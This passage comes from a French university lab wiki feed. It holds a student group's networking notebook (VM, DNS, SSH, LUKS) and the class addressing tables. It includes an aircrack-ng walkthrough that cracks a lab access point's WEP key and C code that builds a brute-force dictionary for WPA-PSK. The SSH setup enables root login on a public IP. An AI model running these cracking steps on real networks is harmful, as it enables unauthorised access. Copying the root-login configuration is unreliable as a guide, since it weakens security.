Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54090</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54090"/>
				<updated>2020-11-30T15:25:35Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Informations générales */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53875</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53875"/>
				<updated>2020-11-17T14:04:19Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==A faire==&lt;br /&gt;
&lt;br /&gt;
Chaque binôme peut :&lt;br /&gt;
* '''Compléter les tableaux du plan d'adressage'''&lt;br /&gt;
* Ajouter ses routes sur les 2 routeurs &lt;br /&gt;
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV4 (adresse + vrrp)&lt;br /&gt;
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV6 (adresse)&lt;br /&gt;
&lt;br /&gt;
Vous pouvez vous renseigner sur notre wiki.&amp;lt;br/&amp;gt;&lt;br /&gt;
Faites surtout très attention à ne pas effacer les modifications des autres groupes ainsi que les modifications communes déjà effectuées !&lt;br /&gt;
&lt;br /&gt;
'''Il n'y a rien à modifier sur les vlan 1, 131, 301, 314 et 333 !'''&amp;lt;br/&amp;gt;&lt;br /&gt;
'''Il n'y a rien à faire au niveau du rip'''&lt;br /&gt;
&lt;br /&gt;
Si vous avez le moindre doute, '''demandez-nous''' !&lt;br /&gt;
&lt;br /&gt;
Cordialement,&lt;br /&gt;
&lt;br /&gt;
Le groupe 14&lt;br /&gt;
&lt;br /&gt;
==Plan d'adressage==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique) !! IP (privée)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 314&lt;br /&gt;
| 193.48.57.176&lt;br /&gt;
| 100.64.0.16&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| truffe.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 312&lt;br /&gt;
| 193.48.57.177&lt;br /&gt;
| 100.64.0.17&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 311&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| pleurote.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 310&lt;br /&gt;
| 193.48.57.179&lt;br /&gt;
| 100.64.0.19&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| calicedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 309&lt;br /&gt;
| 193.48.57.180&lt;br /&gt;
| 100.64.0.20&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| piedbleu.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 308&lt;br /&gt;
| 193.48.57.181&lt;br /&gt;
| 100.64.0.21&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| girolle.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 307&lt;br /&gt;
| 193.48.57.182&lt;br /&gt;
| 100.64.0.22&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 306&lt;br /&gt;
| 193.48.57.183&lt;br /&gt;
| 100.64.0.23&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 305&lt;br /&gt;
| 193.48.57.184&lt;br /&gt;
| 100.64.0.24&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| tricholome.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 304&lt;br /&gt;
| 193.48.57.185&lt;br /&gt;
| 100.64.0.25&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 303&lt;br /&gt;
| 193.48.57.186&lt;br /&gt;
| 100.64.0.26&lt;br /&gt;
| Port ssh : 2222&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| ophiocordyceps.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 302&lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| 100.64.0.27&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6 !! N° VRRP&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 1&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| 10.60.100.1&lt;br /&gt;
| 10.60.100.2&lt;br /&gt;
| 10.60.100.254&lt;br /&gt;
| 2001:660:4401:60b0::0/64&lt;br /&gt;
| 31&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.8/29&lt;br /&gt;
| 192.168.222.12&lt;br /&gt;
| 192.168.222.13&lt;br /&gt;
| &lt;br /&gt;
| 2001:660:4401:60b1::0/64&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 531&lt;br /&gt;
| 192.168.222.24/29&lt;br /&gt;
| 192.168.222.26&lt;br /&gt;
| 192.168.222.27&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.0/24&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 2001:660:4401:60b2::0/64&lt;br /&gt;
| 33&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| 301&lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 10.60.101.1&lt;br /&gt;
| 10.60.101.2&lt;br /&gt;
| 10.60.101.254&lt;br /&gt;
| 2001:660:4401:60b3::0/64&lt;br /&gt;
| 41&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| ophiocordyceps.site&lt;br /&gt;
| 302&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 10.60.102.1&lt;br /&gt;
| 10.60.102.2&lt;br /&gt;
| 10.60.102.254&lt;br /&gt;
| 2001:660:4401:60b4::0/64&lt;br /&gt;
| 42&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| 303&lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 10.60.103.1&lt;br /&gt;
| 10.60.103.2&lt;br /&gt;
| 10.60.103.254&lt;br /&gt;
| 2001:660:4401:60b5::0/64&lt;br /&gt;
| 43&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| tricholome.site&lt;br /&gt;
| 304&lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 10.60.104.1&lt;br /&gt;
| 10.60.104.2&lt;br /&gt;
| 10.60.104.254&lt;br /&gt;
| 2001:660:4401:60b6::0/64&lt;br /&gt;
| 44&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| 305&lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 10.60.105.1&lt;br /&gt;
| 10.60.105.2&lt;br /&gt;
| 10.60.105.254&lt;br /&gt;
| 2001:660:4401:60b7::0/64&lt;br /&gt;
| 45&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| 306&lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 10.60.106.1&lt;br /&gt;
| 10.60.106.2&lt;br /&gt;
| 10.60.106.254&lt;br /&gt;
| 2001:660:4401:60b8::0/64&lt;br /&gt;
| 46&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| girolle.site&lt;br /&gt;
| 307&lt;br /&gt;
| 10.60.107.0/24&lt;br /&gt;
| 10.60.107.1&lt;br /&gt;
| 10.60.107.2&lt;br /&gt;
| 10.60.107.254&lt;br /&gt;
| 2001:660:4401:60b9::0/64&lt;br /&gt;
| 47&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| piedbleu.site&lt;br /&gt;
| 308&lt;br /&gt;
| 10.60.108.0/24&lt;br /&gt;
| 10.60.108.1&lt;br /&gt;
| 10.60.108.2&lt;br /&gt;
| 10.60.108.254&lt;br /&gt;
| 2001:660:4401:60ba::0/64&lt;br /&gt;
| 48&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| calicedelamort.site&lt;br /&gt;
| 309&lt;br /&gt;
| 10.60.109.0/24&lt;br /&gt;
| 10.60.109.1&lt;br /&gt;
| 10.60.109.2&lt;br /&gt;
| 10.60.109.254&lt;br /&gt;
| 2001:660:4401:60bb::0/64&lt;br /&gt;
| 49&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| pleurote.site&lt;br /&gt;
| 310&lt;br /&gt;
| 10.60.110.0/24&lt;br /&gt;
| 10.60.110.1&lt;br /&gt;
| 10.60.110.2&lt;br /&gt;
| 10.60.110.254&lt;br /&gt;
| 2001:660:4401:60bc::0/64&lt;br /&gt;
| 50&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
| 51&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| truffe.site&lt;br /&gt;
| 312&lt;br /&gt;
| 10.60.112.0/24&lt;br /&gt;
| 10.60.112.1&lt;br /&gt;
| 10.60.112.2&lt;br /&gt;
| 10.60.112.254&lt;br /&gt;
| 2001:660:4401:60be::0/64&lt;br /&gt;
| 52&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| 314&lt;br /&gt;
| 10.60.114.0/24&lt;br /&gt;
| 10.60.114.1&lt;br /&gt;
| 10.60.114.2&lt;br /&gt;
| 10.60.114.254&lt;br /&gt;
| 2001:660:4401:60bf::0/64&lt;br /&gt;
| 54&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.1/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.2/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
